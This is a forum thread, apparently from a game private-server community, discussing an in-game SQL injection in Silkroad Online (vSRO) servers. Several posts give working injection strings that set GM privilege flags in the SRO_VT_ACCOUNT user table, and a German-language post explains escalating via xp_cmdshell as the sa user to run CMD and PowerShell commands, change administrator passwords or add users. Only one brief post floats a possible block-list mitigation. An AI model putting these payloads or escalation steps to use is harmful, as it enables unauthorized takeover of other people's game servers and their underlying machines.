[INFORMATION] SQL Injection (ingame)

Quote:

Originally Posted by geheimerbauer But it is just possible to get access to SRO_VT_SHARD.dbo or can i get access to SRO_VT_ACCOUNT.dbo too?

It's a SQL inject, you can access whatever DB you wish.

Thank you.

I dont know SQL very well. i just have some basic knowledge in Java.

I'm also not so familiar with silkroad files, but is it possible to make a GM account like this?

I know there is not realy a use for it, when you have access to the DB, but it could happen that you lose Fortress :D

Quote:

Originally Posted by geheimerbauer Thank you. I dont know SQL very well. i just have some basic knowledge in Java. I'm also not so familiar with silkroad files, but is it possible to make a GM account like this? Code: a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';-- a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';-- I know there is not realy a use for it, when you have access to the DB, but it could happen that you lose Fortress :D

a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1, sec_content = 1 WHERE StrUserID = 'YourAccountID';--

Will not work if they changed SRO_VT_ACCOUNT to something else ^^

Quote:

Originally Posted by geheimerbauer Thank you. I dont know SQL very well. i just have some basic knowledge in Java. I'm also not so familiar with silkroad files, but is it possible to make a GM account like this? Code: a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_primary = 1 WHERE StrUserID = 'YourAccountID';-- a'; UPDATE SRO_VT_ACCOUNT.dbo.TB_User SET sec_content = 1 WHERE StrUserID = 'YourAccountID';-- I know there is not realy a use for it, when you have access to the DB, but it could happen that you lose Fortress :D

Ja, sollte funktionieren wenn die Database nicht umbenannt wurde, und selbst wenn kann du dir die Database genannt beim Namen zusenden lassen (indem du das Message System von Silkroad benutzt)

Desweiteren ist es möglich sollte xp_cmdshell aktiviert sein ganze CMD Befehle auszuführen (z.b. das Password des Admins ändern oder dir sogar einen neuen Benutzer erstellen) - das geht aber nur wenn der SQL Service mit local administrator rechten ausgestattet ist

Und da die benutzer welche die Silkroad Databases managen meist der sa user ist kannst du im zweifel xp_cmdshell selbst aktivieren ([Only registered and activated users can see links. Click Here To Register...])

mit der CMD ist es dir dann möglich die Powershell zu starten welche im vergleich zur CMD viel mächtiger ist und solltest du die Powershell beherschen und Administrator rechte haben dann ist ganz vorbei.


Die SQL Injection ist weitaus kritischer als viele denken.

what da hell did i just see?????????? i didn't investigate that exploit until now
oh-no seriously vsro are a piece shit yada-yada-yada

yet still be able to restrict it through blocking tables name @ ServerSide (only) inside AbuseFilter.txt at least who will try to execute it will get crash

honestly didn't execute that horrible exploit yet so i can't confirm that the fix i just mentioned is either work or not (if it could be called a fix after all xD)

Quote:

Originally Posted by ZeonNETWORK what da hell did i just see?????????? i didn't investigate that exploit until now oh-no seriously vsro are a piece shit yada-yada-yada yet still be able to restrict it through blocking tables name @ ServerSide (only) inside AbuseFilter.txt at least who will try to execute it will get crash honestly didn't execute that horrible exploit yet so i can't confirm that the fix i just mentioned is either work or not (if it could be called a fix after all xD)

That's the only injection there is. Stop over exaggerating please.

Quote:

Originally Posted by ​Exo That's the only injection there is. Stop over exaggerating please.

you mean there's a lot of sql injections out there?
well i don't know, been a long time from vsro (sticked with BR and Tsro somehow)
okay can you post the common injections??

Quote:

Originally Posted by ZeonNETWORK you mean there's a lot of sql injections out there? well i don't know, been a long time from vsro (sticked with BR and Tsro somehow) okay can you post the common injections??

There isn't any other injections in-game. All other strings are being checked before a procedure call is executed. This is the only one.

nobody know
some new way to sql injection , coz that way so old